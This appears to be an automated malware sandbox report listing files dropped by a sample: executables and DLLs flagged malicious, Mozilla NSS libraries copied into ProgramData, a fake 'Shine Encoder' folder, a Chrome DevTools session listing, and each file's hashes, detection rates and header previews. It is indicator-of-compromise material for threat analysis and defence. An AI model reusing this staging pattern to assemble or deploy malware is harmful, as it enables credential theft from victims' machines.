Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\76f1524c8d.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1848320
Entropy (8bit):	7.94769563102028
Encrypted:	false
SSDEEP:	49152:fg85eHbF1uBBQiFJXjM9uoihYuf2mQIt:fbqmr/lj9EQPQI
MD5:	EC1204EE4264E2DDE75A9BADC5023363
SHA1:	5E0432D8B0071D009E9AD29F6C5C9358B847CDF5
SHA-256:	67B3C01AD9D9162E83214BE4A8F2F1979D735B257A7D680325C64544E4FC98BD
SHA-512:	122A74D6F944FDD025C283C81EC2547A537F7AEEC07C1C94E5FB97D44EDF75995724AF0CD62C454CC33DDDE44F20D5ED92254E55E8ACEB82150933B6DE4ED189
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....4g.............................`I...........@...........................I......3....@.................................T@..h............................A...................................................................................... . . .......J..................@....rsrc .....0.......Z..............@....idata .....@.......Z..............@... .P*..P.......\..............@...inlhqcme....../......^..............@...dbbpexbo.....PI.....................@....taggant.0...`I.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243008
Entropy (8bit):	6.645060214025585
Encrypted:	false
SSDEEP:	49152:BwQwirsf7bu1+zubKQi4eiLyqhATx7u6B:BMzbGAubK37iLPhGJ
MD5:	314E0BB891690BF44AB39895FC0AC49F
SHA1:	F442DACE32225260D9BF319B81CBB26F8F87D1AD
SHA-256:	E98530780ADCF430B4D68357915856F30F43FCA0209493565B80BF09FBCF8E66
SHA-512:	07CE29E88EF94FFAD9A95EF0271069FCF750E181377B53DEE81499035D24621F1B7C626986C042F0987C54245C2D18E48EF1E01C739077C8B22507A8C7904404
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....}>2...@.................................W...k.......H....................l1.............................tl1..................................................... . ............................@....rsrc...H...........................@....idata ............................@...edncfhzz..........................@...ywkrkdul.....p1......V1.............@....taggant.0....1.."...Z1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2790400
Entropy (8bit):	6.4545699688386335
Encrypted:	false
SSDEEP:	24576:dsqgxhrTzjs6uvO9DMrBYTCQq3mkzfpuuuEBJksrg89xEfVG6TWXD7gLjYkUr5zN:Ajs7O99mHF4Orziq5KPLTovBS6mLXjt
MD5:	273688D08CE0EDD09E29A0A0D2FEAF6D
SHA1:	2A08F6B1CBEC6606E25C1450F7A3E833C107DF85
SHA-256:	ACC8F0812BA6C78BA173A5B3A714AA5802A78D907DD5B8BFE8E2293EF4946AB7
SHA-512:	DE51B00379DB99C7FD93FD3D3D6EB823553E9730D41A1F9DF462A7E4E83A93BAF2CF3E10BC77389F45094B202841726F87630B71BCE18820972842563420B5B2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+..........`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...fnateuls.@......4..:..............@...eutlwerm. ..........n.............@....taggant.@....+.."...r.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\stories[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6233398
Entropy (8bit):	7.946426242317142
Encrypted:	false
SSDEEP:	98304:PX4wRX+gNnYLzYhrMfgiBB3owncvnuOK+VWUhFh6J3GB4VVPYhpYEFyazx1G0:vnRX+gNnYvgHycaYwTVVPQyaB
MD5:	CBB34D95217826F4AD877E7E7A46B69C
SHA1:	D903374F9236B135CF42C4A573B5CD33DF9074BD
SHA-256:	707B321C42FBAA91CF41A9B41C85F3B56C7326CB32F40FC495F17DF83B21CBED
SHA-512:	EEC4382387A1C2223DA3350A28EC250CFA6DD2EDB7EDA6C516EE32FC784638F23005E992AF337E9D87878FE2049B0A41DF7F1C65C9D717D6A8771D7833BE3F60
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...3..\.................j...........~............@.......................................@......@...................`.......@...........F...........................................................................B..@....P.......................text....P.......R.................. ..`.itext..h....p.......V.............. ..`.data....7.......8...n..............@....bss....lg...............................idata.......@......................@....didata......P......................@....edata.......`......................@..@.tls.........p...........................rdata..]...........................@..@.rsrc....F.......F..................@..@....................................@..@........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.360295504004713
Encrypted:	false
SSDEEP:	48:SfNaoQ9TEQOfNaoQihQiGfNaoQDW6QDifNaoQrU0UrU0U8Qz:6NnQ9TEQ2NnQAQJNnQDW6QDKNnQrU0Ug
MD5:	25F75E3DC585D158A0219F5BE9E5D96E
SHA1:	70077CC6D6718905A3ECFFCBDD41E637824E4313
SHA-256:	AD0B138CC266BB3FA8AEF46F32A26488D649470D72411D778232FC2608C4F3D9
SHA-512:	DCA9FA85EE5F1F3A7EA5D841874CEC27A9DC3202C0A8DC01AF826A377156ABBBCBABC477250DB0DB915AF6E90B7957AD0B7A7D05B97056A26E33F28BCFE3B4B2
Malicious:	false
Reputation:	unknown
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/D8B5E943E8F4595B55C527053EC2EE42",.. "id": "D8B5E943E8F4595B55C527053EC2EE42",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/D8B5E943E8F4595B55C527053EC2EE42"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/205DD28A2B00FEEA99EFCDB60576B69F",.. "id": "205DD28A2B00FEEA99EFCDB60576B69F",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/205DD28A2B00FEEA99EFCDB60576B69F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1812480
Entropy (8bit):	7.946782640864916
Encrypted:	false
SSDEEP:	24576:iyO0WNSipzzzKsELqntGnCp3o4J1LqwbbVtFMDjJnucPk5XJt6mtJC:i0e746tyoEwOucPk5XJ8
MD5:	A8916B1DB51981824CF0545DF6864FB9
SHA1:	1FAEA8FAF266FD74109256096CC1DCE4ACB9298B
SHA-256:	BC6CE7042E0B92A139C10C803493ADC1C87BDDB4FE2F9F44A9F2A052833960E8
SHA-512:	DF9BA0E339EB25F2CFFE7BD17D9B50A6407F89F8580C5E1F5F5696308780EE22CBD8C3D7D4A060A4FAB9036B4964BA66B2C5E9FF02E93B2DD870CF6F7B4BF5ED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@".......i...........@...........................i......"....@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... ..*...$......t..............@...ylgrvzmt.....`O......v..............@...sdrnsjgb.....pi.....................@....taggant.0....i.."..................@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\CH375DLL.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15864
Entropy (8bit):	5.446150628226878
Encrypted:	false
SSDEEP:	384:zVQEjoZ7ooLzDCccymQx/9DSpNAJemtjf0Ncl08:zV1joxLH1SpKJtTF08
MD5:	43F2BC6828B177477C2F98B8973460E8
SHA1:	F0A3C975346AF66A843E8B49574DC9083CD32E02
SHA-256:	3B578B15AD0D0747E8A3D958A0E7BF1FF6D5C335B8894FF7A020604DA008D79D
SHA-512:	2449C3D615E5BCECE4C1B773FE629A75061A3E1488F6D3D743D7D209F1D687F26997937AB13B3A1B89B650D122DB030D2188E1E89BC1AB03CF2DF9A29CAA456C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................l.......^...............Rich............PE..L.....C (.........!.........................0....@..........................`......B}...............................'.......$..P....@..H....................P..<.......T...............................................\|............................text............................... ..`.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Arrows.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	56223
Entropy (8bit):	7.675938408908281
Encrypted:	false
SSDEEP:	1536:/+jsHu4IMEuSznazX2TQZwm+WxhM6HMy6Z7:/ppIMEulGTuwmXhMwMB
MD5:	619CA288DE840F0BEC52218DB7F2036C
SHA1:	D1D5389AAE91284734F4940BD8319CFA2BC40A0D
SHA-256:	C2A6D78B635CA45E316D10936EF7507B1643F4674BAA08B79FE22285EADC3966
SHA-512:	4FACBC40E37F9801E9177A057D55BF236C5FBCE5397AF973B60B21C027AB258FD1A91B893F93AE3100A6785AD67089FBF623C121B7D4990A987A311E47314E5C
Malicious:	false
Reputation:	unknown
Preview:	BSCAL...............)...............................................$..G..............4........=.......~L..`.....U........n........y.......T............O....W...%....\|...b............z................DSCAL...............................\|.1..%.[.B=l.8....I9s\QP2..?..U.G....."....7..[d.b...6.,J]./;[.{T....*bV....$G.M......../T..5y............w.5.y...N...:.,.y..k.........0....0........Arrows.Craft Edge.Shapes..........8.....8"...`...............................DSCAL................................ u..d[........P.[..Y5eD..w..s.5~.._.Ev\.,o...E.......}5..3J..6.6E<W\|.....6.[..s..... .@zc.X.f....I.........R.f..x.T.....A.........1....1..."....Arrow 1.Craft Edge.Shapes..........8.....8....`.........Arrow 1.d.d......PNG........IHDR...d...d.....p.T....bKGD.............AIDATx...KHT{....c.$......l..g(...DP..4.@#h.Zd.,.!Y..R8.P..&.EFa..I.E....K."....t..v.v.uG...2.....A_..9z,B.4....Po@\|O.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(F.(&,...v.......C..Phii....7o.P[[..h......

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Basic Shapes.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	132979
Entropy (8bit):	7.662743912764236
Encrypted:	false
SSDEEP:	3072:viQWV2mUue1Kkp5F8U4rpAzmYDbUabHidS42O9mR:vTWa91dFr4rpwnUTdF2O6
MD5:	F88752DB58C53A82F2DCD5D11F8233AB
SHA1:	6D41999B017AD74783339AD00E03811F48A60E97
SHA-256:	8B5AD9F2E46D3331989887761AFB6C3C7786BCA8D846444BF2FF234FD4E0E2DD
SHA-512:	86350CC5DB773D092BFBDCB5710E90391ECE9D243E16706CD17E62197683520478FD32C2D4036DF45AF9326F59BF263A7FF7E56C662BEC5AA3960F6328852A00
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................-......4........S....:.................!)........6.._....C<..>.....D......./S........\........b..i.....z.......W........j........f...-.................I........v....c...9......................J........*$........0..r.....;..&.....G..B.....M........Z........^........b..x....%v...........o....U...W................./........U.................;......................p................. .................a.......DSCAL..........................@...5.2N33....^m...n-.C0O.i.!w.2G.,.".).22.............a{[X ..N.>...{.,.W..0...{.]F<{a<f~....+.=...sj....M.,.<..z.(~.V.2\|i....{j.(..C.'..`..]......R...Ex2...H.N.............6....6........Basic Shapes.Craft Edge.Shapes................."...`...............................DSCAL..........................@...3..k33....^m...n-.C0O.i.!w.2G.,.".).22\|..B..[k.3..Y.....B..q..}4..X<.96H.. v..N...Nr......@......ss#%.\.:.g.3..4..$.e..3...3.....bd..c.<:.....L.t..... ...y.Y...................F....Arch.Craft Edge.Shapes...........

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Createinspain Designs.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	543833
Entropy (8bit):	7.50496335178111
Encrypted:	false
SSDEEP:	6144:9DQ1236dLlSmlgZOw9/+wdM0zOyJromlIK1Z7HsH1GpYMnhdjYnDf67:dx6dLk/xSc+6sV8YIhdkDf67
MD5:	7D692438B7E70DE932BC386A3D44D319
SHA1:	5FC91DF8EA79A005A8583DCF44E0D48B7EC5A90F
SHA-256:	05CB2D622DDEED62E052B8BBDB19DBE99B83F44F4447408601823B518D330586
SHA-512:	1A605B25724B91BE5802104BC8BAA0C4EB0A3638CFD84D8AECFF10FC41B72BFD44DDD8DA34373C1BB8B7C8D4823D222441E0CFAF9696B8F119F8BEA37ED9724D
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................4......D....6........'...j0....H..b........x....k........T...G%....9..}0....j...........]....r...N..................2...x...#............./...:9...iJ...F............k........d...z................-.................d...."............S....%...........................)..=.....7........B..@.....]........o..E....;....A...+...09...[....2..../..y....];........J.......WX........e........r......._...2........L........'.......=k....<..o^........Q.......<........A........r..DSCAL........@a"-..............@......v33....^m...n-.C0O.i.!w.2G.,.".).22.....N%....;.b7.P....G...1.u...iD..........A...[ys.@..zX.m.j.Y~....y...K<....n.l.......L...P..=......@...@.A4...t.@"..z..........F....F........Createinspain Designs.Craft Edge.Miscellaneous..........4.....4....`...............................DSCAL..........................@.....r33....^m...n-.C0O.i.!w.2G.,.".).22.,"...~u..@....7.p.m.Q.&?@..d.>........ <"..-.`2@...aM.....+,..<........Sm.9....C.O.5p.Q..c....

